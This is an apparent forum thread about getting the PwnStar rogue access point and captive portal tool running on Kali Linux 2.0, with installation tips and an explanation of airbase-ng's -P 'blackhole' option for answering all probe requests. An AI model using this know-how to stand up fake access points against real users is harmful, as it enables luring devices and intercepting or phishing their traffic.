I installed pwnstar with the installer.sh and run the pwnstar file. Then I chose 9 (Advanced Menu) and then A (captive portals).
After that the program asked me if we're giving internet access, so I pressed y. So it showed me available interfaces but if I type those, it tells me that these devices do not exist or do not match?


Here is a screen:715



What am I doing wrong here?

It seems all tools from Kali 1 need some upgrade for Kali 2....

To ZeroXX

Unfortunately we are prevented by forums rules from helping you here. So go to this link

http://forum.aircrack-ng.org/index.php/topic,414.msg3224.html#msg3224

Okey I will try your solution thank you mmusket :)

To ZeRoXX

You should follow this thread in aircrack-ng. We cannot correct Pwnstar9 for kali2.0 as long as this problem exists as only half the program would function. We have solved the problems with VMR-MDK for kali2.0 and may release but this network-manager problem is making us hesitate.

http://forum.aircrack-ng.org/index.php/topic,1062.0.html

MTeams

Both incron and the isc-dhcp-server are now available for kali-linux 2.0(KL2) thru

apt-get install incron
apt-get install isc-dhcp-server

As MTeams has already posted a method that allows one(1) wifi device to be placed monitor mode while still accessing the internet thru a second device, the major obstacles to configuring PwnStar9.0 for KL2 no longer exist.

The program will still require changes in bash coding. MTeams will post here if we get the program up and running under KL2.

MTeams

That's great and we hope to see soon here a working new version for Kali 2 :)

Is there any way to have multiple SSIDs on the softAP with just one wifi card?

Or maybe using a dlink Router connected to the kali PC via cable?

You can have airbase-ng respond to ALL probe requests. Its called a Blackhole. Just put a -P in the airbase-ng command line. Type airbase-ng --help for further details.

MTeams

Thanks. I was able to do it using the pwnstar-mv1.2. In this blackhole mode it simulates more than one AP simultaneosly.